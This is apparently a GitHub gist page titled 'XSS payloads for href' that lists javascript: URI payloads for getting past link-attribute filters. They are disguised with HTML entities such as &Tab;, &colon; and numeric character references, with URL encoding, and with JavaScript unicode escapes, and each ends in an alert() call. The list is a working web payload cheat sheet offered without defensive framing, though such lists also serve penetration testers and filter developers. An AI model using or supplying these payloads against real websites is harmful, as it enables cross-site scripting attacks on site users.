Skip to content

Instantly share code, notes, and snippets.

@hackerscrolls

hackerscrolls/href_bypass.html

Last active April 14, 2025 08:18
Show Gist options
  • Save hackerscrolls/49b0a6edf955097fa8f92ddbf2eddbc9 to your computer and use it in GitHub Desktop.
Save hackerscrolls/49b0a6edf955097fa8f92ddbf2eddbc9 to your computer and use it in GitHub Desktop.
Download ZIP
XSS payloads for href
Raw
href_bypass.html
<!--javascript -->
ja&Tab;vascript:alert(1)
ja&NewLine;vascript:alert(1)
ja&#x0000A;vascript:alert(1)
java&#x73;cript:alert()
<!--::colon:: -->
javascript&colon;alert()
javascript&#x0003A;alert()
javascript&#58;alert(1)
javascript&#x3A;alert()
<!-- alert -->
#HTML entities/encode:
javascript:alert&lpar;&rpar;
javascript:al&#x65;rt``
#url encoding:
javascript:alert%60%60
javascript:x='%27-alert(1)-%27';
javascript:%61%6c%65%72%74%28%29
#JS unicode
javascript:a\u006Cert``"
javascript:\u0061\u006C\u0065\u0072\u0074``
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment